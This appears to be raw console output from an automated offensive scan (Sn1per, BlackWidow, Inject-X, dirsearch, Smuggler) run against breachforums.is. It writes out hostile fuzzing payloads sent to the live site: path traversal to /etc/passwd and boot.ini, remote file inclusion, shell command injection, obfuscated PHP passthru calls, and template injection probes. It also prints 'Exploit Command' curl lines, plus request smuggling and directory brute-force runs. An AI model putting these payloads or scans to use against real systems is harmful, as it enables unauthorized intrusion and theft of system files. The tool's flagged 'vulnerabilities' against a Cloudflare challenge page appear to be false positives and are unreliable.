https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//campaigns/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//products/cloudflare-workers/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//integrations/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//trust-hub/technologies/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//gdpr/introduction/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//trust-hub/abuse-approach/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//about-overview/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//diversity-equity-and-inclusion/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//people/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//press/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//careers/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//connect2023/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//logo/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//network/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//privacypolicy/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//website-terms/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//disclosure/
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is//trademark/
__________________________________________________________________________________________________
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is
https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 

[+] URL's Discovered: 
/usr/share/blackwidow/breachforums.is_8443/breachforums.is_8443-urls-sorted.txt                                     
__________________________________________________________________________________________________

[+] Dynamic URL's Discovered: 
/usr/share/blackwidow/breachforums.is_8443/breachforums.is_8443-dynamic-sorted.txt                                  
__________________________________________________________________________________________________

[+] Form URL's Discovered: 
/usr/share/blackwidow/breachforums.is_8443/breachforums.is_8443-forms-sorted.txt                                    
__________________________________________________________________________________________________

[+] Unique Dynamic Parameters Discovered: 
/usr/share/blackwidow/breachforums.is_8443/breachforums.is_8443-dynamic-unique.txt                                  
__________________________________________________________________________________________________

[+] Sub-domains Discovered: 
/usr/share/blackwidow/breachforums.is_8443/breachforums.is_8443-subdomains-sorted.txt                               
__________________________________________________________________________________________________

[+] Emails Discovered: 
/usr/share/blackwidow/breachforums.is_8443/breachforums.is_8443-emails-sorted.txt                                   
__________________________________________________________________________________________________

[+] Phones Discovered: 
/usr/share/blackwidow/breachforums.is_8443/breachforums.is_8443-phones-sorted.txt                                   
__________________________________________________________________________________________________

[+] Loot Saved To: 
/usr/share/blackwidow/breachforums.is_8443/                                                                         
__________________________________________________________________________________________________

      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/?__cf_chl_tk=3WkbHpWJDB1ImnWz3hxOIxYQjFKmHksDosU7ECIyP5s-1692197194-0-gaNycGzNC1A [404] [0]                                                                                                                 
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/captcha.php?imagehash=141828baf01d56225b0847031cab8d6d [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/alerts.php?modal=1 [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee5b8440c22172a [200] [169136]                                                                                                                  
======================================================================================================

>>> https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee5b8440c22172a [200] [170012]                                                                                                                  
======================================================================================================
[D] Fuzzing Parameter: ray=
----------------------------------------------------
[i] Trying Payload: google.com
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=google.com [200] [172752] [-2740]                                                                                                       
[i] Trying Payload: //google.com
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=//google.com [200] [181285] [-11273]                                                                                                    
[i] Trying Payload: https%3A//google.com
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=https%3A//google.com [200] [181267] [-11255]                                                                                            
[i] Trying Payload: INJECTX
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=INJECTX [200] [177618] [-7606]                                                                                                          
[i] Trying Payload: '
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=' [200] [178609] [-8597]                                                                                                                
[i] Trying Payload: \
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=\ [200] [175965] [-5953]                                                                                                                
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini [200] [171562] [-1550]                                                     
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00 [200] [171562] [-1550]                                                  
[i] Trying Payload: ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm                                                                                                        
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm [200] [169870] [142]       
[i] Trying Payload: ..%2fWEB-INF%2fweb.xml
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=..%2fWEB-INF%2fweb.xml [200] [177618] [-7606]                                                                                           
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/../../../../../../../../../../../../../../../../../etc/passwd [200] [181267] [-11255]                                                  
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/../../../../../../../../../../../../../../../../../etc/passwd%00 [200] [169870] [142]                                                  
[i] Trying Payload: /etc/passwd
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/etc/passwd [200] [185659] [-15647]                                                                                                     
[i] Trying Payload: /etc/passwd%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/etc/passwd%00 [200] [176251] [-6239]                                                                                                   
[i] Trying Payload: C:\boot.ini
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=C:\boot.ini [200] [175965] [-5953]                                                                                                      
[i] Trying Payload: C:\boot.ini%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=C:\boot.ini%00 [200] [172308] [-2296]                                                                                                   
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=hTtP://tests.arachni-scanner.com/rfi.md5.txt [200] [172308] [-2296]                                                                     
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=hTtP://tests.arachni-scanner.com/rfi.md5.txt%00 [200] [179392] [-9380]                                                                  
[i] Trying Payload: %7B%7B1336%252B1%7D%7D
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%7B1336%252B1%7D%7D [200] [176458] [-6446]                                                                                           
[+] Server Side Template Injection Found! 
[+] Vulnerable URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%7B1336%252B1%7D%7D                                                                                                           
[c] Exploit Command: curl -s 'https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%7B1336%252B1%7D%7D' | egrep 1337 --color=auto                                                                      
[i] Trying Payload: 1336%2B1
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=1336%2B1 [200] [181267] [-11255]                                                                                                        
[+] Server Side Template Injection Found! 
[+] Vulnerable URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=1336%2B1
[c] Exploit Command: curl -s 'https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=1336%2B1' | egrep 1337 --color=auto                                                                                    
[i] Trying Payload: %24%28cat%2B/etc/passwd%29
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%24%28cat%2B/etc/passwd%29 [200] [179809] [-9797]                                                                                       
[i] Trying Payload: %24%28sleep%2B10%29
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%24%28sleep%2B10%29 [200] [172752] [-2740]                                                                                              
[i] Trying Payload: phpinfo%28%29
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=phpinfo%28%29 [200] [182799] [-12787]                                                                                                   
[i] Trying Payload: 1336%2B1
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%24%7Bpassthru%28chr%2899%29.chr%2897%29.chr%28116%29.chr%2832%29.chr%2847%29.chr%28101%29.chr%28116%29.chr%2899%29.chr%2847%29.chr%28112%29.chr%2897%29.chr%28115%29.chr%28115%29.chr%28119%29.chr%28100%29%29%7D%7D%7B%24%7Bexit%28%29%7D%7D [200] [181734] [-11722]                                                                                                       
[i] Trying Payload: 1336%2B1
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%24%7Bpassthru%28chr%28115%29.chr%28108%29.chr%28101%29.chr%28101%29.chr%28112%29.chr%2832%29.chr%2849%29.chr%2848%29%29%7D%7D%7B%24%7Bexit%28%29%7D%7D [200] [175965] [-5953]                                                                           
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/.well-known/ai-plugin.json [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=breachforums.is [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/awards.php?view=13 [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


====================================================================================•x[2023-09-17](21:13)x•
 RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/.well-known/ai-plugin.json
https://breachforums.is/.well-known/assetlinks.json
https://breachforums.is/.well-known/dnt-policy.txt
https://breachforums.is/.well-known/gpc.json
https://breachforums.is/.well-known/security.txt
https://breachforums.is/.well-known/trust.txt
https://breachforums.is/ads.txt
https://breachforums.is/app-ads.txt
https://breachforums.is/canary.txt
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING INTERESTING PARAMETERS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING XSS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/alerts.php?modal=1
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING SSRF STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1690800105
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING REDIRECT STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING RCE STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING IDOR STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING SQL STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING LFI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING SSTI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING DEBUG STATIC ANALYSIS 
====================================================================================•x[2023-09-17](21:13)x•
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
====================================================================================•x[2023-09-17](21:13)x•
 DOWNLOADING ALL JAVASCRIPT FILES 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 DISPLAYING ALL JAVASCRIPT COMMENTS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 DISPLAYING ALL JAVASCRIPT LINKS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING LINKFINDER 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 DISPLAYING PATH RELATIVE LINKS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 DISPLAYING JAVASCRIPT URLS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 DISPLAYING JAVASCRIPT DOMAINS 
====================================================================================•x[2023-09-17](21:13)x•
====================================================================================•x[2023-09-17](21:13)x•
 RUNNING COMMON FILE/DIRECTORY BRUTE FORCE 
====================================================================================•x[2023-09-17](21:13)x•

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: htm, html, asp, aspx, php, jsp, js | HTTP method: GET | Threads: 100 | Wordlist size: 9696

Output File: /usr/share/sniper/loot/workspace/https:--breachforums.is/web/dirsearch-breachforums.is.txt

Error Log: /usr/share/sniper/plugins/dirsearch/logs/errors-23-09-17_21-13-42.log

Target: http://breachforums.is:8443/

[21:13:43] Starting: 
                                                                              
Task Completed                                                                                                      
====================================================================================•x[2023-09-17](21:23)x•
 RUNNING HTTP REQUEST SMUGGLING DETECTION 
====================================================================================•x[2023-09-17](21:23)x•

  ______                         _              
 / _____)                       | |             
( (____  ____  _   _  ____  ____| | _____  ____ 
 \____ \|    \| | | |/ _  |/ _  | || ___ |/ ___)
 _____) ) | | | |_| ( (_| ( (_| | || ____| |    
(______/|_|_|_|____/ \___ |\___ |\_)_____)_|    
                    (_____(_____|               

     @defparam                         v1.1

[+] URL        : https://breachforums.is:8443
[+] Method     : POST
[+] Endpoint   : 
[+] Configfile : default.py
[+] Timeout    : 5.0 seconds
[+] Cookies    : 0 (Appending to the attack)
[nameprefix1]  : OK (TECL: 0.42 - 400) (CLTE: 0.19 - 400)                                           
[tabprefix1]   : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[tabprefix2]   : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[space1]       : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[midspace-01]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[postspace-01] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-01]  : OK (TECL: 0.19 - 400) (CLTE: 0.17 - 400)                                           
[endspace-01]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-01] : OK (TECL: 0.18 - 400) (CLTE: 0.20 - 400)                                           
[endspacex-01] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-01]: OK (TECL: 0.20 - 400) (CLTE: 0.28 - 400)                                           
[xnprespace-01]: OK (TECL: 0.21 - 400) (CLTE: 0.20 - 400)                                           
[endspacerx-01]: OK (TECL: 0.20 - 400) (CLTE: 0.20 - 400)                                           
[endspacexn-01]: OK (TECL: 0.22 - 400) (CLTE: 0.20 - 400)                                           
[midspace-04]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[postspace-04] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-04]  : OK (TECL: 0.21 - 400) (CLTE: 0.19 - 400)                                           
[endspace-04]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-04] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-04] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-04]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-04]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-04]: OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-04]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[midspace-08]  : OK (TECL: 0.24 - 400) (CLTE: 0.25 - 400)                                           
[postspace-08] : OK (TECL: 0.24 - 400) (CLTE: 0.23 - 400)                                           
[prespace-08]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspace-08]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-08] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-08] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-08]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-08]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-08]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-08]: OK (TECL: 0.20 - 400) (CLTE: 0.18 - 400)                                           
[midspace-09]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[postspace-09] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-09]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspace-09]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-09] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-09] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-09]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-09]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-09]: OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-09]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[midspace-0a]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[postspace-0a] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[prespace-0a]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspace-0a]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-0a] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-0a] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-0a]: OK (TECL: 0.26 - 400) (CLTE: 0.27 - 400)                                           
[xnprespace-0a]: OK (TECL: 0.25 - 400) (CLTE: 0.24 - 400)                                           
[endspacerx-0a]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-0a]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[midspace-0b]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[postspace-0b] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[prespace-0b]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspace-0b]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-0b] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-0b] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-0b]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-0b]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-0b]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-0b]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[midspace-0c]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[postspace-0c] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-0c]  : OK (TECL: 0.19 - 400) (CLTE: 0.20 - 400)                                           
[endspace-0c]  : OK (TECL: 0.19 - 400) (CLTE: 0.20 - 400)                                           
[xprespace-0c] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-0c] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-0c]: OK (TECL: 0.20 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-0c]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacerx-0c]: OK (TECL: 0.17 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-0c]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[midspace-0d]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[postspace-0d] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[prespace-0d]  : OK (TECL: 0.25 - 400) (CLTE: 0.25 - 400)                                           
[endspace-0d]  : OK (TECL: 0.24 - 400) (CLTE: 0.33 - 400)                                           
[xprespace-0d] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-0d] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-0d]: OK (TECL: 0.18 - 400) (CLTE: 0.23 - 400)                                           
[xnprespace-0d]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-0d]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-0d]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[midspace-1f]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[postspace-1f] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[prespace-1f]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspace-1f]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-1f] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-1f] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-1f]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-1f]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacerx-1f]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-1f]: OK (TECL: 0.25 - 400) (CLTE: 0.18 - 400)                                           
[midspace-20]  : OK (TECL: 0.23 - 400) (CLTE: 0.18 - 400)                                           
[postspace-20] : OK (TECL: 0.19 - 400) (CLTE: 0.20 - 400)                                           
[prespace-20]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspace-20]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-20] : OK (TECL: 0.17 - 400) (CLTE: 0.20 - 400)                                           
